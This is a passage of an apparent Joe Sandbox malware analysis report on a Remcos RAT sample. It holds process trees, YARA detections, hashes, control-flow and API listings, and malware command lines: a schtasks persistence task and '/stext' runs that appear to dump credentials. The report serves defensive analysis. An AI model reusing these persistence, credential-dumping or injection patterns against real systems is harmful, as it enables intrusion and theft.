                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:12:25:32
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                              Imagebase:0x150000
                                                                                                                                              File size:828'368 bytes
                                                                                                                                              MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:10
                                                                                                                                              Start time:12:25:34
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                              File size:1'012'224 bytes
                                                                                                                                              MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 68%, ReversingLabs
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:12:25:35
                                                                                                                                              Start date:05/12/2024
                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                                                              File size:496'640 bytes
                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

Target ID:12
Start time:12:25:37
Start date:05/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
Imagebase:0x240000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:12:25:37
Start date:05/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:12:25:37
Start date:05/12/2024
Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
Imagebase:0xf70000
File size:1'012'224 bytes
MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:16
Start time:12:26:01
Start date:05/12/2024
Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
Imagebase:0x510000
File size:1'012'224 bytes
MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:12:26:01
Start date:05/12/2024
Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
Imagebase:0xf40000
File size:1'012'224 bytes
MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:12:26:01
Start date:05/12/2024
Path:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
Imagebase:0x350000
File size:1'012'224 bytes
MD5 hash:B2618FBB2E344DBDC7D4B33947D71531
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:12:26:01
Start date:05/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12
Imagebase:0x4d0000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:12:27:01
Start date:05/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 1676
Imagebase:0x4d0000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true


Execution Graph

Execution Coverage:10%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:221
Total number of Limit Nodes:11
execution_graph: serialized node/edge list omitted (graph rendering residue). Root nodes: f84668, 59b807b, 59bbcca, 7a37bc0, f8d710, f8d0c0, 7a33f98. API calls appearing as node labels: CreateActCtxA, GetModuleHandleW, ResumeThread, CreateProcessA, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, VirtualAllocEx, PostMessageW, MonitorFromPoint, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DrawTextExW.

Control-flow Graph

control_flow_graph: basic-block edge list for the function starting at 7a3aa60 (blocks spanning 7a3aa60 to 7a3bad2) omitted (graph rendering residue).
Strings
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID: 4'^q$TJcq$Te^q$pbq$xbaq
• API String ID: 0-2576840827
• Opcode ID: e22866a6ea9421acb4f0988994276ff99292595c305ffb6bfae1232f122cea23
• Instruction ID: 1304db3d6c41bec6ec92ee8c4a13e57408748d7d9049ff038b973c9a83dc3fb2
• Opcode Fuzzy Hash: e22866a6ea9421acb4f0988994276ff99292595c305ffb6bfae1232f122cea23
• Instruction Fuzzy Hash: C1B2C5B5E00628CFDB54CF69C984AD9BBB2FF89304F1581E5E419AB225DB319E81CF50
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9f356317d1a324a6e0c7a483d410a2d42e3a01318eb5d44ca9417765a562ba1
• Instruction ID: 1c7664dc46c21af936525321afe10ad192f18633305ecde7b8809b9b368c1966
• Opcode Fuzzy Hash: d9f356317d1a324a6e0c7a483d410a2d42e3a01318eb5d44ca9417765a562ba1
• Instruction Fuzzy Hash: 99E1CB707016058FFB29EB65C650BAEB7FAEF89700F14446AE1069B395CB79EC01CB51
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66cae27aebb82045835b23a27df979e95d2fd277c5d49d5c7ed28c45f916f3fd
• Instruction ID: f6a09ea6a2a6f98b21bc72e9381fea75199f93a562e2c67cbfc3cb295b4c359a
• Opcode Fuzzy Hash: 66cae27aebb82045835b23a27df979e95d2fd277c5d49d5c7ed28c45f916f3fd
• Instruction Fuzzy Hash: AFA1E4B5E05229CFDB14CFAAC8447EDBBF6BF8A301F109069E429AB251DB745985CF40
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6fe140d6ab0ae4c1eb0208e3cf9172bb2b27b1ed126b15c2c0112c737422f9a5
• Instruction ID: 316a1c5653242e75101a6de1fda3f8d1512f265937f0807eaea1b206e72e9b0d
• Opcode Fuzzy Hash: 6fe140d6ab0ae4c1eb0208e3cf9172bb2b27b1ed126b15c2c0112c737422f9a5
• Instruction Fuzzy Hash: A6A1F7B5E05229CFDB14CFA5D8447EDBBF2BF8A301F1090A9E419AB251DB745985CF40
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 267b5a6945b986220b6f42de1f26d7866434b4fb475d1387db9c85cea592d10f
• Instruction ID: c6bdb5785ece9d713338741231852d3324931a9d62966fc5095d0e71cbdc8a44
• Opcode Fuzzy Hash: 267b5a6945b986220b6f42de1f26d7866434b4fb475d1387db9c85cea592d10f
• Instruction Fuzzy Hash: 0781D4B4E19218CFCB14DFA9C4846EDBBF5BF4A300F249156E429A7246D7349985CF50
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8844971667345cb36650d4158c81af18ea49688d4cc24d3f7adf351a8648febd
• Instruction ID: b43e38f7a111f91686f0d355195ba9c8187f4a71b9140d8fcd164f03705f19d0
• Opcode Fuzzy Hash: 8844971667345cb36650d4158c81af18ea49688d4cc24d3f7adf351a8648febd
• Instruction Fuzzy Hash: E541B3B5E04618DFDB18DFAAD9406AEFBF6BF89300F14C16AE818A7255DB305941CF40
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25d454bff383af9c5ff64450ca5b7712d975839fe5e71e8c9f7d2e77263bea30
• Instruction ID: 15a9e071104de6a1bc3176a8b5dfa99b24c0cdfa166509cd5c78348aa43cdecf
• Opcode Fuzzy Hash: 25d454bff383af9c5ff64450ca5b7712d975839fe5e71e8c9f7d2e77263bea30
• Instruction Fuzzy Hash: 223182B5E046188BEB18CFABD94469EFAF7BFC9300F14C16AD818A7265EB345941CF50
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de8e8e8ebb534afafcaca03800c8b94157d872134c9a0517154a5b492404ae7a
• Instruction ID: 0c988866ba575614a0abbb1c32bb41eca3c17b8532e4986227021156e1faad42
• Opcode Fuzzy Hash: de8e8e8ebb534afafcaca03800c8b94157d872134c9a0517154a5b492404ae7a
• Instruction Fuzzy Hash: FAC09226E9E008D3B910DC84AA112FCE33FC2CF13AE013C62965EB309241D19A290289

Control-flow Graph
control_flow_graph 466 f8d0b1-f8d14f GetCurrentProcess 471 f8d158-f8d18c GetCurrentThread 466->471 472 f8d151-f8d157 466->472 473 f8d18e-f8d194 471->473 474 f8d195-f8d1c9 GetCurrentProcess 471->474 472->471 473->474 476 f8d1cb-f8d1d1 474->476 477 f8d1d2-f8d1ed call f8d699 474->477 476->477 480 f8d1f3-f8d222 GetCurrentThreadId 477->480 481 f8d22b-f8d28d 480->481 482 f8d224-f8d22a 480->482 482->481
APIs
• GetCurrentProcess.KERNEL32 ref: 00F8D13E
• GetCurrentThread.KERNEL32 ref: 00F8D17B
• GetCurrentProcess.KERNEL32 ref: 00F8D1B8
• GetCurrentThreadId.KERNEL32 ref: 00F8D211
Memory Dump Source
• Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 1e3a5dce87a6ee9bcb1f60b8c661b4c8f5468b0cbc957b554a40ab281dda1e5a
• Instruction ID: 416c324c506440755335b9b09a6ab09efcd3baa3568c2679b3fce27495491fcb
• Opcode Fuzzy Hash: 1e3a5dce87a6ee9bcb1f60b8c661b4c8f5468b0cbc957b554a40ab281dda1e5a
• Instruction Fuzzy Hash: 0C5163B09007098FDB04DFA9D948BDEBBF1AF88314F208459E419A73A0DB749984CF69

Control-flow Graph
control_flow_graph 489 f8d0c0-f8d14f GetCurrentProcess 493 f8d158-f8d18c GetCurrentThread 489->493 494 f8d151-f8d157 489->494 495 f8d18e-f8d194 493->495 496 f8d195-f8d1c9 GetCurrentProcess 493->496 494->493 495->496 498 f8d1cb-f8d1d1 496->498 499 f8d1d2-f8d1ed call f8d699 496->499 498->499 502 f8d1f3-f8d222 GetCurrentThreadId 499->502 503 f8d22b-f8d28d 502->503 504 f8d224-f8d22a 502->504 504->503
APIs
• GetCurrentProcess.KERNEL32 ref: 00F8D13E
• GetCurrentThread.KERNEL32 ref: 00F8D17B
• GetCurrentProcess.KERNEL32 ref: 00F8D1B8
• GetCurrentThreadId.KERNEL32 ref: 00F8D211
Memory Dump Source
• Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: ab44ccd2cce290940a4d768ec3f2b5a241d8ea541c867e4fc01085fd610d4919
• Instruction ID: deb1909466329b257781f50a76e342afbc2d3a965a3ef87e7fc5ca27711ebfc2
• Opcode Fuzzy Hash: ab44ccd2cce290940a4d768ec3f2b5a241d8ea541c867e4fc01085fd610d4919
• Instruction Fuzzy Hash: 165164B0D003098FDB04DFA9D948BDEBBF1AF88314F208559E419A73A0D7749884CF65

Control-flow Graph
control_flow_graph 601 59b7859-59b78f5 604 59b792e-59b794e 601->604 605 59b78f7-59b7901 601->605 610 59b7950-59b795a 604->610 611 59b7987-59b79b6 604->611 605->604 606 59b7903-59b7905 605->606 608 59b7928-59b792b 606->608 609 59b7907-59b7911 606->609 608->604 612 59b7913 609->612 613 59b7915-59b7924 609->613 610->611 614 59b795c-59b795e 610->614 621 59b79b8-59b79c2 611->621 622 59b79ef-59b7aa9 CreateProcessA 611->622 612->613 613->613 615 59b7926 613->615 616 59b7981-59b7984 614->616 617 59b7960-59b796a 614->617 615->608 616->611 619 59b796e-59b797d 617->619 620 59b796c 617->620 619->619 623 59b797f 619->623 620->619 621->622 624 59b79c4-59b79c6 621->624 633 59b7aab-59b7ab1 622->633 634 59b7ab2-59b7b38 622->634 623->616 625 59b79e9-59b79ec 624->625 626 59b79c8-59b79d2 624->626 625->622 628 59b79d6-59b79e5 626->628 629 59b79d4 626->629 628->628 630 59b79e7 628->630 629->628 630->625 633->634 644 59b7b3a-59b7b3e 634->644 645 59b7b48-59b7b4c 634->645 644->645 646 59b7b40 644->646 647 59b7b4e-59b7b52 645->647 648 59b7b5c-59b7b60 645->648 646->645 647->648 649 59b7b54 647->649 650 59b7b62-59b7b66 648->650 651 59b7b70-59b7b74 648->651 649->648 650->651 652 59b7b68 650->652 653 59b7b86-59b7b8d 651->653 654 59b7b76-59b7b7c 651->654 652->651 655 59b7b8f-59b7b9e 653->655 656 59b7ba4 653->656 654->653 655->656 658 59b7ba5 656->658 658->658
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059B7A96
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: e75718302f983012804303a12db165ffa794522a2ff371c2bd310eeb91a44d2f
• Instruction ID: 27c82aa088e4efea5e2115e5a2034412656ef6903833cbc7482860b3f61da4cb
• Opcode Fuzzy Hash: e75718302f983012804303a12db165ffa794522a2ff371c2bd310eeb91a44d2f
• Instruction Fuzzy Hash: 1A917E71D00219DFEB10DFA8C941BEDBBB6FF84314F1482AAD849A7250DBB49985CF91

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059B7A96
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: edd73f92fd3668ea9571f18f12024d2e0c894e01236803e423ab128aac90d33d
• Instruction ID: 7608bff0e19a7fa9f8ed78b74b6df250a8db8c039e2d7594887498feaa602e0f
• Opcode Fuzzy Hash: edd73f92fd3668ea9571f18f12024d2e0c894e01236803e423ab128aac90d33d
• Instruction Fuzzy Hash: 2C916E71D00219DFEB24DFA8C941BEDBBB6FF84314F1482A9D849A7240DBB49985CF91

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00F8B07E
Memory Dump Source
• Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 9b51c9edd8f4cc339fd59a7e5827005eb89d36e8f096ca3f6ac0f40a95e5762b
• Instruction ID: 7cad79d27fd48f55ba97e2b8795d1297c8b9bb09f03c7ef3ab9a8f160c8f1e23
• Opcode Fuzzy Hash: 9b51c9edd8f4cc339fd59a7e5827005eb89d36e8f096ca3f6ac0f40a95e5762b
• Instruction Fuzzy Hash: D57146B0A00B058FE724EF2AD45579ABBF1FF88310F108A2EE486D7A50D775E945CB91

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 00F859C9
Memory Dump Source
• Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: cc347eb29623da81282ac25f57fce28ee74f519bae1d1c00ebde1bcd296da2a7
• Instruction ID: cb32992cb0dfc0bee15204cf33d5578eda4d527ddf2d87053fa8651490aede39
• Opcode Fuzzy Hash: cc347eb29623da81282ac25f57fce28ee74f519bae1d1c00ebde1bcd296da2a7
• Instruction Fuzzy Hash: D941F2B0C00619CBDB24DFA9C8847DEBBB5BF48704F20816AD408AB255DBB5A985CF90

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 00F859C9
Memory Dump Source
• Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 78fb7f71a16e944c7826f82f1938911804a4629fd21ea933711760eb61793939
• Instruction ID: d30232eb1dbe1fc527c9b0afbfbccc7a1e12c93a30254b855f5e81666f3cbf00
• Opcode Fuzzy Hash: 78fb7f71a16e944c7826f82f1938911804a4629fd21ea933711760eb61793939
• Instruction Fuzzy Hash: 6B41F2B1C00619CBDB24DFA9C8847CDBBB5BF48314F24846AD408AB255DBB59985CF90

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 07A3402F
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: eb10962a326b2e4942565129a611c9be3f7081fb9e1802c5e2809fdb95976493
• Instruction ID: d8f6a074bc2ce325e5f171206b37a0e23a6f66740d86e8ca6a22fd3b60336643
• Opcode Fuzzy Hash: eb10962a326b2e4942565129a611c9be3f7081fb9e1802c5e2809fdb95976493
• Instruction Fuzzy Hash: 9331E2B59002499FDB10CFAAD884AEEFBF4FB48320F14842AE819A7210D775A545CFA0

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 07A3402F
Memory Dump Source
• Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 6b844c93dcb0b6e26785c1e0299e59c79ade123d781dc214f1e325505e27f5b3
• Instruction ID: 95a92906f12e1281463ec2e7a11f609e0a7b1636a1cb64ef716a38f61a6aa4cd
• Opcode Fuzzy Hash: 6b844c93dcb0b6e26785c1e0299e59c79ade123d781dc214f1e325505e27f5b3
• Instruction Fuzzy Hash: C821A0B59002499FDB10CF9AD884AAEFBF5FB48320F54842AE919A7210D775A944CFA4

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059B7230
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: d08424533730f3832e0d63582e81a8574e6bdf3c98650070838d89690a1ff754
• Instruction ID: b92cfbc22d42ec020e9dd61857c63722b0bc5687a56d3a144b25fc7fc1e42974
• Opcode Fuzzy Hash: d08424533730f3832e0d63582e81a8574e6bdf3c98650070838d89690a1ff754
• Instruction Fuzzy Hash: EE2126B5900259CFDB10CFA9C9807DEBBF1FF88310F10842AE959A7250C7789944CFA5

Control-flow Graph
• (rendered graph omitted; legend: Executed / Not Executed)
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059B7230
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: b29ce6f8dd7de8f6011f3deb88fa101d5e9e42e2d77233c205b3f5f68814e19b
• Instruction ID: 307fd1b2794c7f221bd3bb81c66d54e2e9b9271aaa8a30ffe6501e064215ff85
• Opcode Fuzzy Hash: b29ce6f8dd7de8f6011f3deb88fa101d5e9e42e2d77233c205b3f5f68814e19b
• Instruction Fuzzy Hash: 3B2127B19003599FDB10CFA9C985BDEBBF5FF88310F10842AE959A7250C778A944CBA4
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 059BBC95
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: c51acd8951cad31e7a6504537a8f6dcd3f068e9dfe869f276136f4df4065a66c
• Instruction ID: 2c6d39be9a3f3ff144b80bf40e49d1c26ea26ad9525c21413ac9b28acfb699f9
• Opcode Fuzzy Hash: c51acd8951cad31e7a6504537a8f6dcd3f068e9dfe869f276136f4df4065a66c
• Instruction Fuzzy Hash: 2F210871905258CFEB21DF65D5147EEBFF5AF85304F248459C441BB281CB7D5804CBA1
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059B7310
Memory Dump Source
• Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: 76d49efd99a503a29bad7aed5fd5e8c94519d574d7614d5df18793fd454c5420
                                                                                                                                                • Instruction ID: 19f5b24b62ea6deee6b2e73ee8c1ade2cd725b6d1755adacdb44f1fc2b8a2ba0
                                                                                                                                                • Opcode Fuzzy Hash: 76d49efd99a503a29bad7aed5fd5e8c94519d574d7614d5df18793fd454c5420
                                                                                                                                                • Instruction Fuzzy Hash: 9A2134B1C002599FDB10CFA9C981BEEBBF4FF48320F50842AE959A7250C7789944CBA1
